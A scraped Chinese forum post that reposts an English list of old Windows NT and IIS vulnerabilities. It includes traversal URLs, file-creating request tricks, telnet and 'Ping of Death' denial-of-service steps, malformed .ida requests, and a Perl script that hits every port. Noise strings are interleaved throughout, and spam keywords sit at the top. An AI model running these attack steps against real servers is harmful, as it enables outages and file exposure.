久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖

      <small id="r7w9x"></small>
          <td id="r7w9x"></td><sub id="r7w9x"><menu id="r7w9x"><samp id="r7w9x"></samp></menu></sub>
        1. <th id="r7w9x"></th>
          1.  找回密碼
             注冊

            QQ登錄

            只需一步,快速開始

            NT的漏洞及描述(英文)

            [復(fù)制鏈接]
            1#
            發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序瀏覽 |閱讀模式
            受影響系統(tǒng):4.0,iis 1.0
            % }7 t/ J" }8 bA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.' f5 r) F; I/ Y4 N
            ( y3 x/ t8 H' f- K( r/ r. S
            A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
            5 Z0 v; I5 [4 H1 ]. i+ d& J/ Q$ d
            4 O/ o1 q8 {! O, V2 d6 K' D1 PBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.# E! f. F) I. j; @6 S4 F6 f6 S, ]
            7 `: f+ y% o' I7 R# X- v% w5 x+ r
            --------------------------------------------------------------------: h! b+ u  u/ w/ l' V$ h

            7 Q8 g: H4 a% J- `/ q& \2 N0 R受影響系統(tǒng):4.0
            2 r! j6 @9 o- {  rA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
            $ O( R( \* u# W0 K& C0 _- B+ Z5 {+ W9 q
            If the file 'target.bat' exists, the file will be truncated.  l! [. ^( `; I9 Z$ q  W
            ; l8 P2 a8 t& d7 ^
            - i5 [8 U# Z; D9 V" H  e$ g: q
            A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
            / e( c6 Z6 X! t- ^! _- @! R' S  E, g/ P! Z# p
            ----------------------------------------------------------------------2 I& z7 n6 [7 ^+ A
            ' r2 H& ~  Q8 B8 Z. g, B
            受影響系統(tǒng):3.51,4.0
            4 X6 ^8 E& o! r. [2 L9 oMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.; }& \+ K/ r/ {, P6 Q: U) Q
            ' E% T7 a1 |/ E9 V
            The following steps;. L; J. F' x1 k3 w1 U) d

            ! ]! E. }" D9 K* q2 @Telnet to an NT 4.0 system on port 135
              a4 I: o) ?1 r! VType about 10 characters followed by a <CR> : t6 m1 W  P8 Z1 l3 p
            Exit Telnet ! P, |0 ]! A4 R! i
            results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.& }( @6 O2 c8 x0 S' [7 J
            ) ^4 ?+ L" F# J5 a! a
            When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
            ; d, s/ @' [9 |, U2 L4 d+ F$ Q3 G, `* {3 d  E% b! q
            The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.4 ^5 d( D3 M; A" c
            ; l8 p2 W' T8 z9 R* u
            If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.2 W3 Y5 z; T5 ~& ]+ s( g

            9 V% _1 Z1 w1 \: _3 ~; F( yThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):7 D* G$ J; a% n% x! s/ ^1 K: y: E$ h
            0 N% k& n0 r; W5 L7 B) q, A
            /*begin poke code*/
            5 p4 ]) T# l2 h$ j( Q( ]
            9 G! }. X1 ?% \" r& iuse Socket;
            4 W$ H( v1 u% k0 T* @0 C' g* Iuse FileHandle;
            . r- e* s6 }! @! }5 ~8 i5 [/ _1 _require "chat2.pl";) R1 r3 `  m; |) h) i

            0 M) [+ Y! X% F) o# n+ x3 h2 ]5 j$systemname = $ARGV[0] && shift;/ z5 K) r3 u& m9 {( l8 M
            6 N* G0 b+ Z" K2 [9 F4 ]
            $verbose = 1; # tell me what you're hitting3 B* `0 a" \' K. Q
            $knownports = 1; # don't hit known problem ports
            ) R1 o; Z! J5 X& zfor ($port = $0; $port<65535; $port++) & Q- F  N, B* [8 s4 F: s
            {5 h( K' Q  s5 t( z

              A3 b4 B3 h  ]" ^5 f& b* x- F# f& a/ D* c! [
            if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
            # V* h3 v7 J$ W0 Y1 c" e4 E3 D  Vnext;
            7 y! ~$ L- [6 d. D+ {, |}
            ' M; r) R/ {) S. [$fh = chat::open_port($systemname, $port);
            4 n/ D! H) M  L4 a9 s* M5 qchat::print ($fh,"This is about ten characters or more");; @9 o7 _# u! \1 \* Z2 r
            if ($verbose) {/ O: B3 Q6 B6 ]$ i) K& }, I
            print "Trying port: $port\n";) \$ m1 F& B. M4 M: g5 I
            }
            ! s! s, V/ P0 }) d4 ~chat::close($fh);
            ( @& V2 k. W/ a' K7 U& |# ~, c4 E  ^  b) y- }" V# ]
            }
            5 m/ V2 a4 U4 N; B8 X9 j$ {! ^0 S' b2 G; w8 E9 }

            0 d( b: ]- ^# m1 L* P/ @/*end poke code*/. \8 c8 o6 e+ s/ T: Z1 F* g
            * k: U+ {7 W: k6 r+ z
            Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername1 p2 \0 r! G( M. y+ x
            / G# q+ u9 p: [' }
            --------------------------------------------------------------------------------
            7 y! S' B& G8 c4 g3 i
            8 E* k, W  @8 F" e受影響系統(tǒng):4.0
            % j0 d$ b! e! R2 `  ]Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.! n% K7 A% j6 C

            $ P! N$ X4 Q: g8 l/ c3 w, FThis attack causes Dr. Watson to display an alert window and to log an error:   C0 p& ~$ d) g9 f; W: P

            . r# P# S9 B0 @! u, C"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT", E$ |. J3 Z# S+ y5 j

            2 k9 t5 e" F7 y( m3 y" z--------------------------------------------------------------------------------( l8 I& u4 F- O. n
            : Z" U# Y1 ]8 W/ s
            受影響系統(tǒng):3.51,4.0
            7 w, q- V  m' j9 f2 |: {Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
            7 U  ^( x  X; }- s( X7 ~' e' Z% K
            7 W1 U5 E" R7 U( |4 w9 OSTOP: 0X0000001E+ z& t9 j1 s9 e. \
            KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS3 _" o: K% v3 i1 y  ^# {% H

            8 h$ l4 N3 A  q  Y5 S2 K: o5 ?-OR-  e( ~3 B. y+ ?  n  |# R

            $ Z! q2 G+ ^9 @" PSTOP: 0x0000000A
            / X4 Y4 _7 K3 M) U6 I, k5 VIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS4 a! Z7 v) ~  w1 K, t/ q$ e% A

            : i  l2 d/ c" ?0 [) @NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.2 u2 m4 u4 I) c! H
            . E  Z# y8 K2 o" X: b0 @3 n; W( l
            --------------------------------------------------------------------------------
            9 x- A, s+ a4 i5 K" c; g6 A  a' @% k2 k9 n  B9 }
            Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
            6 u, V- N$ A7 S
            4 Q$ U+ u, G" y, X4 W, b6 x+ |( G--------------------------------------------------------
            2 |4 {+ ~1 m4 m! T# P+ W! l1 m: L3 F+ e8 m- T
            IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
            您需要登錄后才可以回帖 登錄 | 注冊

            本版積分規(guī)則

            QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機版|小黑屋|汶上信息港 ( 魯ICP備19052200號-1 )

            GMT+8, 2025-7-13 17:05

            Powered by Discuz! X3.5

            © 2001-2025 Discuz! Team.

            快速回復(fù) 返回頂部 返回列表